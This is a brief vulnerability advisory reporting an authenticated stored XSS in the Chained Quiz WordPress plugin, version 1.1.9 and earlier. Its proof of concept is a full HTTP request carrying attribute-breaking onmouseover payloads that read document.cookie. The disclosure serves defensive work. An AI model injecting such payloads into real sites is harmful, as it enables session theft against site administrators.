Chained Quiz < 1.1.9.1 – Authenticated Stored XSS

Description

WordPress Plugin Plugin Chained Quiz latest (1.1.9) and before suffers from a Stored XSS vulnerability in the sender_name, admin_subject and user_subject POST parameter when an admin completes the setting for plugin (as a result, the severity is very low)

Proof of Concept

POST /wp-admin/admin.php?page=chainedquiz_options HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://example.com/wp-admin/admin.php?page=chainedquiz_options
Content-Type: application/x-www-form-urlencoded
Content-Length: 364
Connection: close
Cookie: [Admin cookies]
Upgrade-Insecure-Requests: 1

sender_name=a%22+onmouseover%3D%22alert%28document.cookie%29&sender_email=a&admin_subject=a%22+onmouseover%3D%22alert%28document.cookie%29&user_subject=a%22+onmouseover%3D%22alert%28document.cookie%29&go_ahead_value=WordPress%5C%5C&csv_delim=%2C&csv_quotes=1&ok=Save+Options&_wpnonce=9fb2fc749f&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dchainedquiz_options